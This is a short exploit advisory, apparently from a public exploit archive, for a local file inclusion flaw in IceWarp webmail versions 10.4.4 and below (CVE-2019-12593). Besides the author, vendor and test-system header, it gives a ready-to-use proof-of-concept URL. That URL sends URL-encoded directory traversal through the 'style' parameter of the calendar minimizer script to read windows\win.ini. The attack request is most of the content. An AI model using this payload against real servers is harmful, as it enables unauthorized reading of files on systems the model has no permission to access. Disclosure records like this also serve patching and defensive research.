IceWarp versions 10.4.4 and below suffer from a local file inclusion vulnerability.
8eedeb172cfa2d07a0b87b57a65840a5# Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:
http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]
Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini